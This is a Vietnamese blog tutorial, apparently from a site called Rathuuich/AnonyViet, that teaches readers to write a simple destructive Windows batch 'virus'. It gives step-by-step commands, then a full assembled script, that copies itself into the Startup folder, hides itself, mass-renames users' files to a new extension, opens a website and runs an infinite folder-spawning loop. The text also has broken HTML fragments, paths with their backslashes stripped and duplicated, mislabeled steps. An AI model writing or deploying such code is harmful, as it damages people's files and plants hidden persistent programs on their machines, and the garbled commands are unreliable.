Chào các bạn, hôm nay Rathuuich sẽ hướng dẫn chi tiết các bạn viết một chương trình Virus cực kỳ đơn giản, qua bài viết này sẽ giúp các bạn nắm thêm kiến thức về lệnh CMD trong Windows, từ đó làm nền tảng để hiểu thêm Power Shell nếu bạn nào thích nghiên cứu chuyên sâu.
Trong bài này chúng tôi sẽ diễn giải các lệnh cơ bản nhất của CMD, và tùy theo tư duy các bạn có thể phát triển để virus này nguy hiểm hơn. Tuy nhiên với mục đích là để tìm tòi nghiên cứu học hỏi chứ không phải phá hoại, do đó các bạn đừng nên sử dụng kiến thức của mình đi để phá người khác nhé.
Bây giờ chúng ta sẽ đi từng lệnh cụ thể trong CMD, sau đó ráp lại thành 1 bộ code hoàn chỉnh để thực thi virus nhé.
Bài 1: Rathuuich.com/huong-dan-tu-viet-virus-cuc-manh-pha-windows” target=”_blank” rel=”noopener noreferrer” class=”local-link”>Hướng dẫn tự viết Virus cực mạnh phá Windows
Bài 2: Tăng thêm sức mạnh cho Virus phá Windows
Chuẩn bị
- Notepad
- Mở CMD (nhấn phím Windows R, gõ lên cmd)
- Dùng máy ảo hoặc ra quán net để Test
Xác định thư mục làm việc
Trước tiên ta cần trỏ dấu nhắc đợi lệnh về 1 đường dẫn cố định để dễ test. Trong bài này, mình sẽ để đường dẫn là ổ đĩa D: cho dễ quản lý
Gõ lệnh:
D:
khi đấy đường dẫn làm việc của ta sẽ là ổ đĩa D:
Rathuuich.com/wp-content/uploads/2017/04/1-1.png” class=”local-link”>Rathuuich.com/wp-content/uploads/2017/04/1-1.png” alt=”Hướng dẫn tự viết Virus cực mạnh phá Windows 7″ width=”508″ height=”174″ title=”Hướng dẫn tự viết Virus cực mạnh phá Windows 9″ srcset=”https://Rathuuich.com/wp-content/uploads/2017/04/1-1.png 508w, https://anonyviet.com/wp-content/uploads/2017/04/1-1-300×103.png 300w” sizes=”(max-width: 508px) 100vw, 508px”>
Tạo File bằng lệnh echo
Để tạo ra con virus tất nhiên bạn phải ra file chứa các lệnh thực thi con virus ấy, trong CMD chúng ta dùng lệnh echo để tạo file có nội dung, với cấu trúc lệnh như sau:
echo > virus.bat
Lệnh này cho phép ta tạo ra một file tên là virus.bat, nhưng chưa có nội dung.
Tiếp đến ta thêm nội dung cho file virus.bat bằng lệnh:
echo off: dùng để tắt hiển thị lệnh khi thực thi file
echo echo off > x.bat echo "noi dung dong 1" >> virus.bat echo "noi dung dong 2" >> virus.bat echo "noi dung dong 3" >> virus.bat
Tóm lại:
- 1 dấu > là tạo file
- 2 dấu >> là thêm nội dung file
Bây giờ chúng ta truy cập vào ổ đĩa D: sẽ thấy có 1 file tên là virus.bat, và dùng notepad để mở file này nên sẽ thấy các nội dung như hình bên dưới
Đổi màu chữ trong CMD
Để làm con em virus thêm sinh động thì chúng ta có thể đổi màu chữ từ màu trắng cổ điển sau các màu khác như xanh, đỏ, tím, vàng…. Bạn sử dụng lệnh: color số quy định màu.
Ví dụ: để chuyển chữ sang màu xanh lá cây, mã màu là số 2 thì ta gõ lệnh
color 2
Dùng lệnh Copy để sao chép
Nếu muốn Virus này ẩn mình vào 1 thư mục nào đó, hoặc muốn cho em virus này khởi động theo Windows, mỗi lần khởi động Windows lên Virus sẽ tự thực thi, thì cần cho nó tự sao chép vào đường dẫn Startup.
Thư mục nơi chứa các tập tin để được khởi động cùng Windows được quy định là
"C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup"
Do đó ta cần copy con Virus này vào thư mục trên, sử dụng lệnh Windows
copy virus.bat "C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup"
Cách ẩn mình của Virus
Để ẩn mình, tránh sự phát hiện bằng mắt thường, mình sẽ dùng lệnh attrib để tự đặt chế độ ẩn file.
Do mình đã copy virus này vào thư mục Startup, nên cần phải di chuyển dấu nhắc đợi lệnh về thư mục đó, dùng lệnh cd để di chuyển dấu nhắc
cd "C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup"
Tiếp đến dùng lệnh attrib để ẩn file
attrib +h virus.bat
Đổi đuôi File
Để tăng phần nguy hiểm cho Virus thì chúng ta sẽ cho đổi đuôi tất cả các File tìm thấy về 1 đuôi khác do bạn quy định, dùng lệnh ren.
Ví dụ: để đổi tất cả các file có đuôi .exe về đuôi .anonyviet thì ta dùng lệnh:
ren *.exe *.anonyviet
Ví dụ: để đổi tất cả các file và tất cả các đuôi về đuôi .anonyviet thì ta dùng lệnh:
ren *.* *.anonyviet
*.* //tất cả các file và tất cả các đuôi
*.anonyviet // đổi hết về đuôi .anonyviet
Thực thi File
Để virus tự kích hoạt một file bất kỳ hoặc kích hoạt chính mình thì dùng lệnh
start “tên chương trình muốn kích hoạt”
Ví dụ: muốn Virus tự mở website anonyviet.con thì dùng lệnh
start https://anonyviet.com
Ví dụ: muốn Virus tự mở kích hoạt file virus.bat
start d:virus.bat
Vòng lặp
Các bạn mở 1 file notepad ra và gõ lệnh bên dưới, sau đó save 1 file với len vonglap.bat, để xem cách hoạt động nhé
Các bạn xem ví dụ bên dưới nhé:
@echo off d: cd virus :x md %random% goto x
d: //đi đến thư mục làm việc ổ đĩa D:
md anonyviet // tạo thư mục có tên
cd anonyviet // di chuyển con trỏ vào thư mục anonyviet
: x là điểm bắt đầu vòng lặp
md: lệnh tạo thư mục
%ramdom%: lệnh tạo ra các con số ngẫu nhiên
goto x trở về điểm bắt đầu
Như vậy, đường đi sẽ là:
- Lệnh thực thi đến phần x,
- Nó sẽ tạo ra 1 thư mục với tên ngẫu nhiên,
- Gặp goto x lệnh sẽ quay lại x
- Và tiếp tục tạo 1 thư mục với tên ngẫu nhiên
- Rồi gặp goto x, nó lại quay về x
- Và tiếp tục tạo thư mục
Tạo nên 1 vòng lặp vô tận.
Bài tập viết virus đơn giản bằng cmd:
Hoàn thành code 1 virus đơn giản với yêu cầu
- Tạo ra tạo 1 file có tên virus.bat nằm trong ổ đĩa D:
- Nội dung file virus.bat hiển thị dòng chữ rathuuich is Attacking, có màu xanh lá cây
- File Virus này sẽ đổi đuôi tất cả tập tin .txt trong ổ D về thành đuôi .anonyviet
- Tự copy vào thư mục Startup của Windows
- Tự ẩn giấu mình
- Tự kích hoạt anonyviet.bat
OK bây giờ chúng ta mở notepad lên và gõ các lệnh như sau:
Bài giải:
Bước 1: Mở notepad lên và gõ lại theo các lệnh dưới đây,
Bước 2: save file notepad là baigiai.bat
Bước 3: Thực thi file baigiai.bat và xem kết quả
Bước 4: Khởi động lại máy và xem kết quả
Chi tiết bài giải
- Tạo ra tạo 1 file anonyviet.bat trong ổ D: bằng lệnh echo
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. rathuuich is Attacking >> anonyviet.bat
2. File Virus này sẽ đổi đuôi tất cả tập tin .txt trong ổ D về thành đuôi .anonyviet
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. rathuuich is Attacking >> anonyviet.bat
3. File Virus này sẽ đổi đuôi tất cả tập tin .txt trong ổ D về thành đuôi .anonyviet
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. rathuuich is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat
4. Tự mở trang web https://anonyviet.com
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. rathuuich is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com
4. Tự copy vào thư mục Startup của Windows
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. rathuuich is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com copy anonyviet.bat "C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup"
5. Tự ẩn giấu mình
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. rathuuich is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com >> anonyviet.bat copy anonyviet.bat "C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup" echo attrib +h "C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupanonyviet.bat" >> anonyviet.bat echo pause >> anonyviet.bat
6. Thực thi file anonyviet.bat
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. rathuuich is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com >> anonyviet.bat copy anonyviet.bat "C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup" echo attrib +h "C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupanonyviet.bat" >> anonyviet.bat echo pause >> anonyviet.bat start anonyviet.bat
Bây giờ bạn Save code này vào notepad đặt tên baigiai.bat
Rồi khởi động file baigiai.bat để xem kết quả
Như vậy với các đoạn code trên, mỗi khi ban khởi động Windows, nó sẽ tự tìm kiếm trong ổ D các file có đuôi .txt sẽ tự chuyển qua đuôi .anonyviet và khởi động là website của rathuuich lên.
Bài thứ 2 mình đang viết, sẽ thêm sức mạnh cho con virus này, các bạn đón đọc nhé
